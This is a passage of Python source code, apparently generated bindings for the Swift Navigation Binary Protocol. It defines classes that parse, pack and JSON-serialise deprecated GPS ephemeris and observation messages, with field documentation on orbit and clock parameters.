"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGlo.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGlo(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGlo._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGlo._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGlo._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGlo, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_DEP_D = 0x0080
class MsgEphemerisDepD(SBP):
"""SBP class for message MSG_EPHEMERIS_DEP_D (0x0080).
You can have MSG_EPHEMERIS_DEP_D inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GPS satellite position,
velocity, and clock offset. Please see the Navstar GPS
Space Segment/Navigation user interfaces (ICD-GPS-200, Table
20-III) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toe_tow : double
Time of week
toe_wn : int
Week number
toc_tow : double
Clock reference time of week
toc_wn : int
Clock reference week number
valid : int
Is valid?
healthy : int
Satellite is healthy?
sid : GnssSignalDep
GNSS signal identifier
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
reserved : int
Reserved field
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toe_tow' / construct.Float64l,
'toe_wn' / construct.Int16ul,
'toc_tow' / construct.Float64l,
'toc_wn' / construct.Int16ul,
'valid' / construct.Int8ul,
'healthy' / construct.Int8ul,
'sid' / construct.Struct(GnssSignalDep._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,
'reserved' / construct.Int32ul,)
__slots__ = [
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toe_tow',
'toe_wn',
'toc_tow',
'toc_wn',
'valid',
'healthy',
'sid',
'iode',
'iodc',
'reserved',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisDepD,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisDepD, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_DEP_D
self.sender = kwargs.pop('sender', SENDER_ID)
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toe_tow = kwargs.pop('toe_tow')
self.toe_wn = kwargs.pop('toe_wn')
self.toc_tow = kwargs.pop('toc_tow')
self.toc_wn = kwargs.pop('toc_wn')
self.valid = kwargs.pop('valid')
self.healthy = kwargs.pop('healthy')
self.sid = kwargs.pop('sid')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
self.reserved = kwargs.pop('reserved')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisDepD.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisDepD(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisDepD._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisDepD._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisDepD._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisDepD, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_DEP_A = 0x001A
class MsgEphemerisDepA(SBP):
"""SBP class for message MSG_EPHEMERIS_DEP_A (0x001A).
You can have MSG_EPHEMERIS_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Deprecated.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toe_tow : double
Time of week
toe_wn : int
Week number
toc_tow : double
Clock reference time of week
toc_wn : int
Clock reference week number
valid : int
Is valid?
healthy : int
Satellite is healthy?
prn : int
PRN being tracked
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toe_tow' / construct.Float64l,
'toe_wn' / construct.Int16ul,
'toc_tow' / construct.Float64l,
'toc_wn' / construct.Int16ul,
'valid' / construct.Int8ul,
'healthy' / construct.Int8ul,
'prn' / construct.Int8ul,)
__slots__ = [
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toe_tow',
'toe_wn',
'toc_tow',
'toc_wn',
'valid',
'healthy',
'prn',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisDepA, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toe_tow = kwargs.pop('toe_tow')
self.toe_wn = kwargs.pop('toe_wn')
self.toc_tow = kwargs.pop('toc_tow')
self.toc_wn = kwargs.pop('toc_wn')
self.valid = kwargs.pop('valid')
self.healthy = kwargs.pop('healthy')
self.prn = kwargs.pop('prn')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_DEP_B = 0x0046
class MsgEphemerisDepB(SBP):
"""SBP class for message MSG_EPHEMERIS_DEP_B (0x0046).
You can have MSG_EPHEMERIS_DEP_B inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Deprecated.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toe_tow : double
Time of week
toe_wn : int
Week number
toc_tow : double
Clock reference time of week
toc_wn : int
Clock reference week number
valid : int
Is valid?
healthy : int
Satellite is healthy?
prn : int
PRN being tracked
iode : int
Issue of ephemeris data
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toe_tow' / construct.Float64l,
'toe_wn' / construct.Int16ul,
'toc_tow' / construct.Float64l,
'toc_wn' / construct.Int16ul,
'valid' / construct.Int8ul,
'healthy' / construct.Int8ul,
'prn' / construct.Int8ul,
'iode' / construct.Int8ul,)
__slots__ = [
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toe_tow',
'toe_wn',
'toc_tow',
'toc_wn',
'valid',
'healthy',
'prn',
'iode',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisDepB,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisDepB, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_DEP_B
self.sender = kwargs.pop('sender', SENDER_ID)
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toe_tow = kwargs.pop('toe_tow')
self.toe_wn = kwargs.pop('toe_wn')
self.toc_tow = kwargs.pop('toc_tow')
self.toc_wn = kwargs.pop('toc_wn')
self.valid = kwargs.pop('valid')
self.healthy = kwargs.pop('healthy')
self.prn = kwargs.pop('prn')
self.iode = kwargs.pop('iode')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisDepB.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisDepB(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisDepB._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisDepB._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisDepB, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_DEP_C = 0x0047
class MsgEphemerisDepC(SBP):
"""SBP class for message MSG_EPHEMERIS_DEP_C (0x0047).
You can have MSG_EPHEMERIS_DEP_C inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GPS satellite position,
velocity, and clock offset. Please see the Navstar GPS
Space Segment/Navigation user interfaces (ICD-GPS-200, Table
20-III) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toe_tow : double
Time of week
toe_wn : int
Week number
toc_tow : double
Clock reference time of week
toc_wn : int
Clock reference week number
valid : int
Is valid?
healthy : int
Satellite is healthy?
sid : GnssSignalDep
GNSS signal identifier
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
reserved : int
Reserved field
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toe_tow' / construct.Float64l,
'toe_wn' / construct.Int16ul,
'toc_tow' / construct.Float64l,
'toc_wn' / construct.Int16ul,
'valid' / construct.Int8ul,
'healthy' / construct.Int8ul,
'sid' / construct.Struct(GnssSignalDep._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,
'reserved' / construct.Int32ul,)
__slots__ = [
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toe_tow',
'toe_wn',
'toc_tow',
'toc_wn',
'valid',
'healthy',
'sid',
'iode',
'iodc',
'reserved',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisDepC,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisDepC, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_DEP_C
self.sender = kwargs.pop('sender', SENDER_ID)
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toe_tow = kwargs.pop('toe_tow')
self.toe_wn = kwargs.pop('toe_wn')
self.toc_tow = kwargs.pop('toc_tow')
self.toc_wn = kwargs.pop('toc_wn')
self.valid = kwargs.pop('valid')
self.healthy = kwargs.pop('healthy')
self.sid = kwargs.pop('sid')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
self.reserved = kwargs.pop('reserved')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisDepC.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisDepC(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisDepC._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisDepC._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisDepC._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisDepC, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_OBS_DEP_A = 0x0045
class MsgObsDepA(SBP):
"""SBP class for message MSG_OBS_DEP_A (0x0045).
You can have MSG_OBS_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Deprecated.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
header : ObservationHeaderDep
Header of a GPS observation message
obs : array
Pseudorange and carrier phase observation for a
satellite being tracked.
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'header' / construct.Struct(ObservationHeaderDep._parser),
construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepA._parser)),)
__slots__ = [
'header',
'obs',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgObsDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgObsDepA, self).__init__()
self.msg_type = SBP_MSG_OBS_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.header = kwargs.pop('header')
self.obs = kwargs.pop('obs')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgObsDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgObsDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgObsDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgObsDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgObsDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgObsDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_OBS_DEP_B = 0x0043
class MsgObsDepB(SBP):
"""SBP class for message MSG_OBS_DEP_B (0x0043).
You can have MSG_OBS_DEP_B inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
observations that are more interoperable. This message
should be used for observations referenced to
a nominal pseudorange which are not interoperable with
most 3rd party GNSS receievers or typical RTCMv3
observations.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
header : ObservationHeaderDep
Header of a GPS observation message
obs : array
Pseudorange and carrier phase observation for a
satellite being tracked.
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'header' / construct.Struct(ObservationHeaderDep._parser),
construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepB._parser)),)
__slots__ = [
'header',
'obs',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgObsDepB,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgObsDepB, self).__init__()
self.msg_type = SBP_MSG_OBS_DEP_B
self.sender = kwargs.pop('sender', SENDER_ID)
self.header = kwargs.pop('header')
self.obs = kwargs.pop('obs')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgObsDepB.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgObsDepB(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgObsDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgObsDepB._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgObsDepB._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgObsDepB, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_OBS_DEP_C = 0x0049
class MsgObsDepC(SBP):
"""SBP class for message MSG_OBS_DEP_C (0x0049).
You can have MSG_OBS_DEP_C inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The GPS observations message reports all the raw pseudorange and
carrier phase observations for the satellites being tracked by
the device. Carrier phase observation here is represented as a
40-bit fixed point number with Q32.8 layout (i.e. 32-bits of
whole cycles and 8-bits of fractional cycles). The observations
are interoperable with 3rd party receivers and conform
with typical RTCMv3 GNSS observations.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
header : ObservationHeaderDep
Header of a GPS observation message
obs : array
Pseudorange and carrier phase observation for a
satellite being tracked.
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'header' / construct.Struct(ObservationHeaderDep._parser),
construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepC._parser)),)
__slots__ = [
'header',
'obs',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgObsDepC,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgObsDepC, self).__init__()
self.msg_type = SBP_MSG_OBS_DEP_C
self.sender = kwargs.pop('sender', SENDER_ID)
self.header = kwargs.pop('header')
self.obs = kwargs.pop('obs')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgObsDepC.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgObsDepC(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgObsDepC._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgObsDepC._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgObsDepC._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgObsDepC, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_IONO = 0x0090
class MsgIono(SBP):
"""SBP class for message MSG_IONO (0x0090).
You can have MSG_IONO inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ionospheric parameters which allow the "L1 only" or "L2 only" user to
utilize the ionospheric model for computation of the ionospheric delay.
Please see ICD-GPS-200 (Chapter 20.3.3.5.1.7) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_nmct : GPSTimeSec
Navigation Message Correction Table Valitidy Time
a0 : double
a1 : double
a2 : double
a3 : double
b0 : double
b1 : double
b2 : double
b3 : double
sender : int
